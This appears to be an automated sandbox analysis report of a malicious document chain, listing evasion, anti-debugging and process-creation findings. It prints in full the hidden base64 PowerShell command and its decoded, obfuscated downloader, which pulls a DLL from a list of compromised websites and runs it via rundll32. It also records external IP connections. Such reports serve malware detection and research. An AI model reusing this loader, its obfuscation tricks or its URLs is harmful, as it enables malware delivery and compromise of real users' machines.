Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\SysWOW64\rundll32.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3403 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5411 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116 Thread sleep count: 3403 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116 Thread sleep count: 5411 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6476 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100272AB FindFirstFileExW,FindNextFileW,FindClose, 13_2_100272AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10026EEF FindFirstFileExW, 13_2_10026EEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343109C FindFirstFileW, 14_2_0343109C
Source: svchost.exe, 00000008.00000002.470041272.0000016077229000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW ?
Source: powershell.exe, 00000004.00000002.290693155.0000018A2C379000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWBW%SystemRoot%\system32\mswsock.dllAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQBy
Source: powershell.exe, 00000004.00000002.291408602.0000018A2C750000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.266721454.000001BB69A70000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.284405222.0000029CB6290000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.470431975.000001DF15C70000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000008.00000002.471798450.000001607CA62000.00000004.00000001.sdmp Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000008.00000002.471730636.000001607CA4C000.00000004.00000001.sdmp, rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.291408602.0000018A2C750000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.266721454.000001BB69A70000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.284405222.0000029CB6290000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.470431975.000001DF15C70000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000004.00000002.291408602.0000018A2C750000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.266721454.000001BB69A70000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.284405222.0000029CB6290000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.470431975.000001DF15C70000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.469952120.0000013F54829000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000004.00000002.291408602.0000018A2C750000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.266721454.000001BB69A70000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.284405222.0000029CB6290000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.470431975.000001DF15C70000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10001E91 Control_RunDLL,LoadLibraryA,LoadLibraryA,LoadLibraryA,_strlen,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrAccessResource,WriteFileGather,VirtualAlloc,MessageBoxA, 13_2_10001E91
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1000E144 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_1000E144
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10026594 mov eax, dword ptr fs:[00000030h] 13_2_10026594
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100265D7 mov eax, dword ptr fs:[00000030h] 13_2_100265D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1002661A mov eax, dword ptr fs:[00000030h] 13_2_1002661A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001065E mov eax, dword ptr fs:[00000030h] 13_2_1001065E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10026675 mov eax, dword ptr fs:[00000030h] 13_2_10026675
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1002673B mov eax, dword ptr fs:[00000030h] 13_2_1002673B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1002677F mov eax, dword ptr fs:[00000030h] 13_2_1002677F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100267C3 mov eax, dword ptr fs:[00000030h] 13_2_100267C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100267F4 mov eax, dword ptr fs:[00000030h] 13_2_100267F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BC4FF mov eax, dword ptr fs:[00000030h] 13_2_041BC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343C4FF mov eax, dword ptr fs:[00000030h] 14_2_0343C4FF
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1000288D GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,VirtualAlloc,und_memcpy,SetLastError,SetLastError, 13_2_1000288D
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1000E144 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_1000E144
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10004171 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_10004171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10003EE0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_10003EE0

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 152.170.79.100 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 190.247.139.101 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 138.197.99.250 144 Jump to behavior
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b'
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b' Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcA